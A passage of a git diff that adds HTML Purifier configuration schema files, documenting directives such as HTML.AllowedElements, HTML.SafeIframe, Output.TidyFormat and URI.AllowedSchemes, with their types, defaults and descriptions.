NULL +--DESCRIPTION-- + +<p> + If HTML Purifier's attribute set is unsatisfactory, overload it! + The syntax is "tag.attr" or "*.attr" for the global attributes + (style, id, class, dir, lang, xml:lang). +</p> +<p> + <strong>Warning:</strong> If another directive conflicts with the + elements here, <em>that</em> directive will win and override. For + example, %HTML.EnableAttrID will take precedence over *.id in this + directive. You must set that directive to true before you can use + IDs at all. +</p> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.AllowedComments.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.AllowedComments.txt new file mode 100644 index 000000000..140e21423 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.AllowedComments.txt @@ -0,0 +1,10 @@ +HTML.AllowedComments +TYPE: lookup +VERSION: 4.4.0 +DEFAULT: array() +--DESCRIPTION-- +A whitelist which indicates what explicit comment bodies should be +allowed, modulo leading and trailing whitespace. See also %HTML.AllowedCommentsRegexp +(these directives are union'ed together, so a comment is considered +valid if any directive deems it valid.) +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.AllowedCommentsRegexp.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.AllowedCommentsRegexp.txt new file mode 100644 index 000000000..f22e977d4 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.AllowedCommentsRegexp.txt @@ -0,0 +1,15 @@ +HTML.AllowedCommentsRegexp +TYPE: string/null +VERSION: 4.4.0 +DEFAULT: NULL +--DESCRIPTION-- +A regexp, which if it matches the body of a comment, indicates that +it should be allowed. Trailing and leading spaces are removed prior +to running this regular expression. +<strong>Warning:</strong> Make sure you specify +correct anchor metacharacters <code>^regex$</code>, otherwise you may accept +comments that you did not mean to! In particular, the regex <code>/foo|bar/</code> +is probably not sufficiently strict, since it also allows <code>foobar</code>. +See also %HTML.AllowedComments (these directives are union'ed together, +so a comment is considered valid if any directive deems it valid.) +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.AllowedElements.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.AllowedElements.txt new file mode 100644 index 000000000..1d3fa7907 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.AllowedElements.txt @@ -0,0 +1,23 @@ +HTML.AllowedElements +TYPE: lookup/null +VERSION: 1.3.0 +DEFAULT: NULL +--DESCRIPTION-- +<p> + If HTML Purifier's tag set is unsatisfactory for your needs, you can + overload it with your own list of tags to allow. If you change + this, you probably also want to change %HTML.AllowedAttributes; see + also %HTML.Allowed which lets you set allowed elements and + attributes at the same time. +</p> +<p> + If you attempt to allow an element that HTML Purifier does not know + about, HTML Purifier will raise an error. You will need to manually + tell HTML Purifier about this element by using the + <a href="http://htmlpurifier.org/docs/enduser-customize.html">advanced customization features.</a> +</p> +<p> + <strong>Warning:</strong> If another directive conflicts with the + elements here, <em>that</em> directive will win and override. +</p> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.AllowedModules.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.AllowedModules.txt new file mode 100644 index 000000000..5a59a55c0 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.AllowedModules.txt @@ -0,0 +1,20 @@ +HTML.AllowedModules +TYPE: lookup/null +VERSION: 2.0.0 +DEFAULT: NULL +--DESCRIPTION-- + +<p> + A doctype comes with a set of usual modules to use. Without having + to mucking about with the doctypes, you can quickly activate or + disable these modules by specifying which modules you wish to allow + with this directive. This is most useful for unit testing specific + modules, although end users may find it useful for their own ends. +</p> +<p> + If you specify a module that does not exist, the manager will silently + fail to use it, so be careful! User-defined modules are not affected + by this directive. Modules defined in %HTML.CoreModules are not + affected by this directive. +</p> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.Attr.Name.UseCDATA.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.Attr.Name.UseCDATA.txt new file mode 100644 index 000000000..151fb7b82 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.Attr.Name.UseCDATA.txt @@ -0,0 +1,11 @@ +HTML.Attr.Name.UseCDATA +TYPE: bool +DEFAULT: false +VERSION: 4.0.0 +--DESCRIPTION-- +The W3C specification DTD defines the name attribute to be CDATA, not ID, due +to limitations of DTD. In certain documents, this relaxed behavior is desired, +whether it is to specify duplicate names, or to specify names that would be +illegal IDs (for example, names that begin with a digit.) Set this configuration +directive to true to use the relaxed parsing rules. +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.BlockWrapper.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.BlockWrapper.txt new file mode 100644 index 000000000..45ae469ec --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.BlockWrapper.txt @@ -0,0 +1,18 @@ +HTML.BlockWrapper +TYPE: string +VERSION: 1.3.0 +DEFAULT: 'p' +--DESCRIPTION-- + +<p> + String name of element to wrap inline elements that are inside a block + context. This only occurs in the children of blockquote in strict mode. +</p> +<p> + Example: by default value, + <code><blockquote>Foo</blockquote></code> would become + <code><blockquote><p>Foo</p></blockquote></code>. + The <code><p></code> tags can be replaced with whatever you desire, + as long as it is a block level element. +</p> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.CoreModules.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.CoreModules.txt new file mode 100644 index 000000000..524618879 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.CoreModules.txt @@ -0,0 +1,23 @@ +HTML.CoreModules +TYPE: lookup +VERSION: 2.0.0 +--DEFAULT-- +array ( + 'Structure' => true, + 'Text' => true, + 'Hypertext' => true, + 'List' => true, + 'NonXMLCommonAttributes' => true, + 'XMLCommonAttributes' => true, + 'CommonAttributes' => true, +) +--DESCRIPTION-- + +<p> + Certain modularized doctypes (XHTML, namely), have certain modules + that must be included for the doctype to be an conforming document + type: put those modules here. By default, XHTML's core modules + are used. You can set this to a blank array to disable core module + protection, but this is not recommended. +</p> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.CustomDoctype.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.CustomDoctype.txt new file mode 100644 index 000000000..a64e3d7c3 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.CustomDoctype.txt @@ -0,0 +1,9 @@ +HTML.CustomDoctype +TYPE: string/null +VERSION: 2.0.1 +DEFAULT: NULL +--DESCRIPTION-- + +A custom doctype for power-users who defined there own document +type. This directive only applies when %HTML.Doctype is blank. +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.DefinitionID.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.DefinitionID.txt new file mode 100644 index 000000000..103db754a --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.DefinitionID.txt @@ -0,0 +1,33 @@ +HTML.DefinitionID +TYPE: string/null +DEFAULT: NULL +VERSION: 2.0.0 +--DESCRIPTION-- + +<p> + Unique identifier for a custom-built HTML definition. If you edit + the raw version of the HTMLDefinition, introducing changes that the + configuration object does not reflect, you must specify this variable. + If you change your custom edits, you should change this directive, or + clear your cache. Example: +</p> +<pre> +$config = HTMLPurifier_Config::createDefault(); +$config->set('HTML', 'DefinitionID', '1'); +$def = $config->getHTMLDefinition(); +$def->addAttribute('a', 'tabindex', 'Number'); +</pre> +<p> + In the above example, the configuration is still at the defaults, but + using the advanced API, an extra attribute has been added. The + configuration object normally has no way of knowing that this change + has taken place, so it needs an extra directive: %HTML.DefinitionID. + If someone else attempts to use the default configuration, these two + pieces of code will not clobber each other in the cache, since one has + an extra directive attached to it. +</p> +<p> + You <em>must</em> specify a value to this directive to use the + advanced API features. +</p> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.DefinitionRev.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.DefinitionRev.txt new file mode 100644 index 000000000..229ae0267 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.DefinitionRev.txt @@ -0,0 +1,16 @@ +HTML.DefinitionRev +TYPE: int +VERSION: 2.0.0 +DEFAULT: 1 +--DESCRIPTION-- + +<p> + Revision identifier for your custom definition specified in + %HTML.DefinitionID. This serves the same purpose: uniquely identifying + your custom definition, but this one does so in a chronological + context: revision 3 is more up-to-date then revision 2. Thus, when + this gets incremented, the cache handling is smart enough to clean + up any older revisions of your definition as well as flush the + cache. +</p> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.Doctype.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.Doctype.txt new file mode 100644 index 000000000..9dab497f2 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.Doctype.txt @@ -0,0 +1,11 @@ +HTML.Doctype +TYPE: string/null +DEFAULT: NULL +--DESCRIPTION-- +Doctype to use during filtering. Technically speaking this is not actually +a doctype (as it does not identify a corresponding DTD), but we are using +this name for sake of simplicity. When non-blank, this will override any +older directives like %HTML.XHTML or %HTML.Strict. +--ALLOWED-- +'HTML 4.01 Transitional', 'HTML 4.01 Strict', 'XHTML 1.0 Transitional', 'XHTML 1.0 Strict', 'XHTML 1.1' +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.FlashAllowFullScreen.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.FlashAllowFullScreen.txt new file mode 100644 index 000000000..7878dc0bf --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.FlashAllowFullScreen.txt @@ -0,0 +1,11 @@ +HTML.FlashAllowFullScreen +TYPE: bool +VERSION: 4.2.0 +DEFAULT: false +--DESCRIPTION-- +<p> + Whether or not to permit embedded Flash content from + %HTML.SafeObject to expand to the full screen. Corresponds to + the <code>allowFullScreen</code> parameter. +</p> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.ForbiddenAttributes.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.ForbiddenAttributes.txt new file mode 100644 index 000000000..57358f9ba --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.ForbiddenAttributes.txt @@ -0,0 +1,21 @@ +HTML.ForbiddenAttributes +TYPE: lookup +VERSION: 3.1.0 +DEFAULT: array() +--DESCRIPTION-- +<p> + While this directive is similar to %HTML.AllowedAttributes, for + forwards-compatibility with XML, this attribute has a different syntax. Instead of + <code>tag.attr</code>, use <code>tag@attr</code>. To disallow <code>href</code> + attributes in <code>a</code> tags, set this directive to + <code>a@href</code>. You can also disallow an attribute globally with + <code>attr</code> or <code>*@attr</code> (either syntax is fine; the latter + is provided for consistency with %HTML.AllowedAttributes). +</p> +<p> + <strong>Warning:</strong> This directive complements %HTML.ForbiddenElements, + accordingly, check + out that directive for a discussion of why you + should think twice before using this directive. +</p> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.ForbiddenElements.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.ForbiddenElements.txt new file mode 100644 index 000000000..93a53e14f --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.ForbiddenElements.txt @@ -0,0 +1,20 @@ +HTML.ForbiddenElements +TYPE: lookup +VERSION: 3.1.0 +DEFAULT: array() +--DESCRIPTION-- +<p> + This was, perhaps, the most requested feature ever in HTML + Purifier. Please don't abuse it! This is the logical inverse of + %HTML.AllowedElements, and it will override that directive, or any + other directive. +</p> +<p> + If possible, %HTML.Allowed is recommended over this directive, because it + can sometimes be difficult to tell whether or not you've forbidden all of + the behavior you would like to disallow. If you forbid <code>img</code> + with the expectation of preventing images on your site, you'll be in for + a nasty surprise when people start using the <code>background-image</code> + CSS property. +</p> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.MaxImgLength.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.MaxImgLength.txt new file mode 100644 index 000000000..e424c386e --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.MaxImgLength.txt @@ -0,0 +1,14 @@ +HTML.MaxImgLength +TYPE: int/null +DEFAULT: 1200 +VERSION: 3.1.1 +--DESCRIPTION-- +<p> + This directive controls the maximum number of pixels in the width and + height attributes in <code>img</code> tags. This is + in place to prevent imagecrash attacks, disable with null at your own risk. + This directive is similar to %CSS.MaxImgLength, and both should be + concurrently edited, although there are + subtle differences in the input format (the HTML max is an integer). +</p> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.Nofollow.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.Nofollow.txt new file mode 100644 index 000000000..700b30924 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.Nofollow.txt @@ -0,0 +1,7 @@ +HTML.Nofollow +TYPE: bool +VERSION: 4.3.0 +DEFAULT: FALSE +--DESCRIPTION-- +If enabled, nofollow rel attributes are added to all outgoing links. +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.Parent.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.Parent.txt new file mode 100644 index 000000000..62e8e160c --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.Parent.txt @@ -0,0 +1,12 @@ +HTML.Parent +TYPE: string +VERSION: 1.3.0 +DEFAULT: 'div' +--DESCRIPTION-- + +<p> + String name of element that HTML fragment passed to library will be + inserted in. An interesting variation would be using span as the + parent element, meaning that only inline tags would be allowed. +</p> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.Proprietary.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.Proprietary.txt new file mode 100644 index 000000000..dfb720496 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.Proprietary.txt @@ -0,0 +1,12 @@ +HTML.Proprietary +TYPE: bool +VERSION: 3.1.0 +DEFAULT: false +--DESCRIPTION-- +<p> + Whether or not to allow proprietary elements and attributes in your + documents, as per <code>HTMLPurifier_HTMLModule_Proprietary</code>. + <strong>Warning:</strong> This can cause your documents to stop + validating! +</p> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.SafeEmbed.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.SafeEmbed.txt new file mode 100644 index 000000000..cdda09a4c --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.SafeEmbed.txt @@ -0,0 +1,13 @@ +HTML.SafeEmbed +TYPE: bool +VERSION: 3.1.1 +DEFAULT: false +--DESCRIPTION-- +<p> + Whether or not to permit embed tags in documents, with a number of extra + security features added to prevent script execution. This is similar to + what websites like MySpace do to embed tags. Embed is a proprietary + element and will cause your website to stop validating; you should + see if you can use %Output.FlashCompat with %HTML.SafeObject instead + first.</p> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.SafeIframe.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.SafeIframe.txt new file mode 100644 index 000000000..5eb6ec2b5 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.SafeIframe.txt @@ -0,0 +1,13 @@ +HTML.SafeIframe +TYPE: bool +VERSION: 4.4.0 +DEFAULT: false +--DESCRIPTION-- +<p> + Whether or not to permit iframe tags in untrusted documents. This + directive must be accompanied by a whitelist of permitted iframes, + such as %URI.SafeIframeRegexp, otherwise it will fatally error. + This directive has no effect on strict doctypes, as iframes are not + valid. +</p> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.SafeObject.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.SafeObject.txt new file mode 100644 index 000000000..ceb342e22 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.SafeObject.txt @@ -0,0 +1,13 @@ +HTML.SafeObject +TYPE: bool +VERSION: 3.1.1 +DEFAULT: false +--DESCRIPTION-- +<p> + Whether or not to permit object tags in documents, with a number of extra + security features added to prevent script execution. This is similar to + what websites like MySpace do to object tags. You should also enable + %Output.FlashCompat in order to generate Internet Explorer + compatibility code for your object tags. +</p> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.Strict.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.Strict.txt new file mode 100644 index 000000000..a8b1de56b --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.Strict.txt @@ -0,0 +1,9 @@ +HTML.Strict +TYPE: bool +VERSION: 1.3.0 +DEFAULT: false +DEPRECATED-VERSION: 1.7.0 +DEPRECATED-USE: HTML.Doctype +--DESCRIPTION-- +Determines whether or not to use Transitional (loose) or Strict rulesets. +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.TargetBlank.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.TargetBlank.txt new file mode 100644 index 000000000..587a16778 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.TargetBlank.txt @@ -0,0 +1,8 @@ +HTML.TargetBlank +TYPE: bool +VERSION: 4.4.0 +DEFAULT: FALSE +--DESCRIPTION-- +If enabled, <code>target=blank</code> attributes are added to all outgoing links. +(This includes links from an HTTPS version of a page to an HTTP version.) +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.TidyAdd.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.TidyAdd.txt new file mode 100644 index 000000000..b4c271b7f --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.TidyAdd.txt @@ -0,0 +1,8 @@ +HTML.TidyAdd +TYPE: lookup +VERSION: 2.0.0 +DEFAULT: array() +--DESCRIPTION-- + +Fixes to add to the default set of Tidy fixes as per your level. +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.TidyLevel.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.TidyLevel.txt new file mode 100644 index 000000000..4186ccd0d --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.TidyLevel.txt @@ -0,0 +1,24 @@ +HTML.TidyLevel +TYPE: string +VERSION: 2.0.0 +DEFAULT: 'medium' +--DESCRIPTION-- + +<p>General level of cleanliness the Tidy module should enforce. +There are four allowed values:</p> +<dl> + <dt>none</dt> + <dd>No extra tidying should be done</dd> + <dt>light</dt> + <dd>Only fix elements that would be discarded otherwise due to + lack of support in doctype</dd> + <dt>medium</dt> + <dd>Enforce best practices</dd> + <dt>heavy</dt> + <dd>Transform all deprecated elements and attributes to standards + compliant equivalents</dd> +</dl> + +--ALLOWED-- +'none', 'light', 'medium', 'heavy' +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.TidyRemove.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.TidyRemove.txt new file mode 100644 index 000000000..996762bd1 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.TidyRemove.txt @@ -0,0 +1,8 @@ +HTML.TidyRemove +TYPE: lookup +VERSION: 2.0.0 +DEFAULT: array() +--DESCRIPTION-- + +Fixes to remove from the default set of Tidy fixes as per your level. +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.Trusted.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.Trusted.txt new file mode 100644 index 000000000..1db9237e9 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.Trusted.txt @@ -0,0 +1,9 @@ +HTML.Trusted +TYPE: bool +VERSION: 2.0.0 +DEFAULT: false +--DESCRIPTION-- +Indicates whether or not the user input is trusted or not. If the input is +trusted, a more expansive set of allowed tags and attributes will be used. +See also %CSS.Trusted. +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.XHTML.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.XHTML.txt new file mode 100644 index 000000000..2a47e384f --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/HTML.XHTML.txt @@ -0,0 +1,11 @@ +HTML.XHTML +TYPE: bool +DEFAULT: true +VERSION: 1.1.0 +DEPRECATED-VERSION: 1.7.0 +DEPRECATED-USE: HTML.Doctype +--DESCRIPTION-- +Determines whether or not output is XHTML 1.0 or HTML 4.01 flavor. +--ALIASES-- +Core.XHTML +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Output.CommentScriptContents.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Output.CommentScriptContents.txt new file mode 100644 index 000000000..08921fde7 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Output.CommentScriptContents.txt @@ -0,0 +1,10 @@ +Output.CommentScriptContents +TYPE: bool +VERSION: 2.0.0 +DEFAULT: true +--DESCRIPTION-- +Determines whether or not HTML Purifier should attempt to fix up the +contents of script tags for legacy browsers with comments. +--ALIASES-- +Core.CommentScriptContents +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Output.FixInnerHTML.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Output.FixInnerHTML.txt new file mode 100644 index 000000000..d6f0d9f29 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Output.FixInnerHTML.txt @@ -0,0 +1,15 @@ +Output.FixInnerHTML +TYPE: bool +VERSION: 4.3.0 +DEFAULT: true +--DESCRIPTION-- +<p> + If true, HTML Purifier will protect against Internet Explorer's + mishandling of the <code>innerHTML</code> attribute by appending + a space to any attribute that does not contain angled brackets, spaces + or quotes, but contains a backtick. This slightly changes the + semantics of any given attribute, so if this is unacceptable and + you do not use <code>innerHTML</code> on any of your pages, you can + turn this directive off. +</p> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Output.FlashCompat.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Output.FlashCompat.txt new file mode 100644 index 000000000..93398e859 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Output.FlashCompat.txt @@ -0,0 +1,11 @@ +Output.FlashCompat +TYPE: bool +VERSION: 4.1.0 +DEFAULT: false +--DESCRIPTION-- +<p> + If true, HTML Purifier will generate Internet Explorer compatibility + code for all object code. This is highly recommended if you enable + %HTML.SafeObject. +</p> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Output.Newline.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Output.Newline.txt new file mode 100644 index 000000000..79f8ad82c --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Output.Newline.txt @@ -0,0 +1,13 @@ +Output.Newline +TYPE: string/null +VERSION: 2.0.1 +DEFAULT: NULL +--DESCRIPTION-- + +<p> + Newline string to format final output with. If left null, HTML Purifier + will auto-detect the default newline type of the system and use that; + you can manually override it here. Remember, \r\n is Windows, \r + is Mac, and \n is Unix. +</p> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Output.SortAttr.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Output.SortAttr.txt new file mode 100644 index 000000000..232b02362 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Output.SortAttr.txt @@ -0,0 +1,14 @@ +Output.SortAttr +TYPE: bool +VERSION: 3.2.0 +DEFAULT: false +--DESCRIPTION-- +<p> + If true, HTML Purifier will sort attributes by name before writing them back + to the document, converting a tag like: <code><el b="" a="" c="" /></code> + to <code><el a="" b="" c="" /></code>. This is a workaround for + a bug in FCKeditor which causes it to swap attributes order, adding noise + to text diffs. If you're not seeing this bug, chances are, you don't need + this directive. +</p> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Output.TidyFormat.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Output.TidyFormat.txt new file mode 100644 index 000000000..06bab00a0 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Output.TidyFormat.txt @@ -0,0 +1,25 @@ +Output.TidyFormat +TYPE: bool +VERSION: 1.1.1 +DEFAULT: false +--DESCRIPTION-- +<p> + Determines whether or not to run Tidy on the final output for pretty + formatting reasons, such as indentation and wrap. +</p> +<p> + This can greatly improve readability for editors who are hand-editing + the HTML, but is by no means necessary as HTML Purifier has already + fixed all major errors the HTML may have had. Tidy is a non-default + extension, and this directive will silently fail if Tidy is not + available. +</p> +<p> + If you are looking to make the overall look of your page's source + better, I recommend running Tidy on the entire page rather than just + user-content (after all, the indentation relative to the containing + blocks will be incorrect). +</p> +--ALIASES-- +Core.TidyFormat +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Test.ForceNoIconv.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Test.ForceNoIconv.txt new file mode 100644 index 000000000..071bc0295 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Test.ForceNoIconv.txt @@ -0,0 +1,7 @@ +Test.ForceNoIconv +TYPE: bool +DEFAULT: false +--DESCRIPTION-- +When set to true, HTMLPurifier_Encoder will act as if iconv does not exist +and use only pure PHP implementations. +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/URI.AllowedSchemes.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/URI.AllowedSchemes.txt new file mode 100644 index 000000000..666635a5f --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/URI.AllowedSchemes.txt @@ -0,0 +1,17 @@ +URI.AllowedSchemes +TYPE: lookup +--DEFAULT-- +array ( + 'http' => true, + 'https' => true, + 'mailto' => true, + 'ftp' => true, + 'nntp' => true, + 'news' => true, +) +--DESCRIPTION-- +Whitelist that defines the schemes that a URI is allowed to have. This +prevents XSS attacks from using pseudo-schemes like javascript or mocha. +There is also support for the <code>data</code> and <code>file</code> +URI schemes, but they are not enabled by default. +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/URI.Base.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/URI.Base.txt new file mode 100644 index 000000000..876f0680c --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/URI.Base.txt @@ -0,0 +1,17 @@ +URI.Base +TYPE: string/null +VERSION: 2.1.0 +DEFAULT: NULL +--DESCRIPTION-- + +<p> + The base URI is the URI of the document this purified HTML will be + inserted into. This information is important if HTML Purifier needs + to calculate absolute URIs from relative URIs, such as when %URI.MakeAbsolute + is on. You may use a non-absolute URI for this value, but behavior + may vary (%URI.MakeAbsolute deals nicely with both absolute and + relative paths, but forwards-compatibility is not guaranteed). + <strong>Warning:</strong> If set, the scheme on this URI + overrides the one specified by %URI.DefaultScheme. +</p> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/URI.DefaultScheme.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/URI.DefaultScheme.txt new file mode 100644 index 000000000..728e378cb --- 